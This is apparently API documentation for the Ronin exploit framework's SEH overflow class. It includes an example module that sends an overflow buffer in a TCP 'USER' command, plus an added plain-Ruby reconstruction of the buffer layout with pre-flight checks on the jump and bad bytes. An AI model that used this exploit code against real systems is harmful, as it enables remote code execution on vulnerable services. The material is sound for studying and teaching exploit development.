Class: Ronin::Exploits::SEHOverflow

Inherits:
MemoryCorruption
Includes:
Mixins::SEH
Defined in:
lib/ronin/exploits/seh_overflow.rb

Overview

Represents a Structured Exception Handler (SEH) overflow.

Example

require 'ronin/exploits/seh_overflow'
require 'ronin/exploits/mixins/remote_tcp'

module Ronin
  module Exploits
    class MyExploit < SEHOverflow

      register 'my_exploit'

      include Mixins::RemoteTCP

      def build
        nseh = 0x06eb9090 # packs little-endian to \x90\x90\xEB\x06: nop, nop, jmp short +6 (over the SEH pointer into the NOP sled)
        seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL

        @buffer = seh_buffer_overflow(length: 1024, nops: 16, payload: payload, nseh: nseh, seh: seh)
      end

      def launch
        tcp_send "USER #{@buffer}"
      end

    end
  end
end

If you want more control over how the buffer is constructed:

def build
  nseh = 0x06eb9090 # packs little-endian to \x90\x90\xEB\x06: nop, nop, jmp short +6 (over the SEH pointer into the NOP sled)
  seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL

  @buffer = junk(1024) + seh_record(nseh,seh) + nops(16) + payload
end
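
The following is an added example, not code from the ronin-exploits library: it reconstructs the buffer layout shown above (junk + SEH record + NOP sled + payload) in plain Ruby without the mixins, and adds the checks a practitioner runs before sending the buffer. The helper names (seh_record, junk, nop_sled, seh_buffer_overflow with a nop_count: keyword, short_jump_target, check_seh_buffer), the 'A' fill byte, the INT3 payload and the bad-byte list are this example's own assumptions; the layout is taken from the second build example on this page, not from the library's implementation.

```ruby
# Added example: plain-Ruby reconstruction of the SEH overflow buffer layout
# shown on this page (junk + seh_record + nops + payload). Helper names and
# sample values are this example's own, not the ronin-exploits API.

# Pack the two-dword SEH record as x86 little-endian: nSEH first, then the
# address of the handler (the pop/pop/ret gadget).
def seh_record(nseh, seh)
  [nseh, seh].pack('V2')
end

# Filler bytes up to the offset at which the SEH record is overwritten.
def junk(length, fill = 'A')
  (fill * length).b
end

# NOP sled placed directly after the 8-byte record.
def nop_sled(count)
  "\x90".b * count
end

# junk(length) + [nSEH][SEH] + nop_sled + payload
def seh_buffer_overflow(length:, nop_count:, payload:, nseh:, seh:)
  junk(length) + seh_record(nseh, seh) + nop_sled(nop_count) + payload
end

# Decode the nSEH dword as the bytes executed once pop/pop/ret returns into
# it: look for a 2-byte short jump (EB rel8) and return the offset, relative
# to the start of the record, where it lands; nil if there is no short jump.
def short_jump_target(nseh_bytes)
  nseh_bytes.each_byte.with_index do |b, i|
    next unless b == 0xEB && i + 1 < 4
    rel = nseh_bytes.getbyte(i + 1)
    rel -= 256 if rel > 127          # rel8 is signed
    return i + 2 + rel               # target = end of the jmp + rel8
  end
  nil
end

# Pre-flight checks: the record must sit at the expected offset, the nSEH
# jump must land past the 8-byte record inside the NOP sled (not on the
# handler pointer), and neither dword may contain a byte the target would
# mangle. The bad-byte list (NUL, CR, LF) is a constructed assumption.
def check_seh_buffer(buffer, offset:, nop_count:, badchars: "\x00\r\n".b)
  record = buffer.byteslice(offset, 8)
  nseh, seh = record.unpack('V2')
  target = short_jump_target(record.byteslice(0, 4))
  sled = (offset + 8)...(offset + 8 + nop_count)
  {
    nseh: nseh,
    seh: seh,
    jump_target: target.nil? ? nil : offset + target,
    lands_in_sled: !target.nil? && sled.cover?(offset + target),
    badchars: record.bytes.select { |b| badchars.include?(b.chr) }.uniq
  }
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample: same nSEH/SEH values as the page, INT3s as payload.
  buf = seh_buffer_overflow(length: 1024, nop_count: 16, payload: "\xCC".b * 32,
                            nseh: 0x06eb9090, seh: 0x1001ae86)
  p check_seh_buffer(buf, offset: 1024, nop_count: 16)
end
```

With the page's values the jump lands at offset 1034, two bytes into the 16-byte sled that starts at 1032, so the sled and payload are reached without executing the handler address as code. A handler address containing 0x00 (common for non-rebased modules) is reported in badchars, which is why the page picks a gadget from SSLEAY32.DLL whose address has no NUL byte.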

Since:

  • 1.0.0

Constant Summary

Constants included from Mixins::NOPS

Mixins::NOPS::NOPS

Class Method Summary

Methods included from Mixins::SEH

#seh_buffer_overflow, #seh_record

Methods included from Mixins::NOPS

#nop, #nops, #perform_validate

Methods included from Mixins::Binary

#pack, #perform_validate, #platform

Methods included from Mixins::Text

#junk

Methods included from Metadata::OS

included, #os, #os_version

Methods included from Metadata::Arch

#arch, included

Methods inherited from Exploit

#NotVulnerable, #Unknown, #Vulnerable, advisories, advisory, #build, #cleanup, disclosed?, disclosure_date, exploit, #exploit, #fail, #initialize, #launch, #perform_build, #perform_cleanup, #perform_launch, #perform_test, #perform_validate, quality, register, release_date, released?, software, software_versions, #test, #validate

Constructor Details

This class inherits a constructor from Ronin::Exploits::Exploit

Class Method Details

.exploit_type ⇒ Symbol

This method is part of a private API. You should avoid using this method if possible, as it may be removed or be changed in the future.

Note:

This is used internally to map an exploit class to a printable type.

Returns the type or kind of exploit.

Returns:

  • (Symbol)

Since:

  • 1.0.0

# File 'lib/ronin/exploits/seh_overflow.rb', line 85

def self.exploit_type
  :seh_overflow
end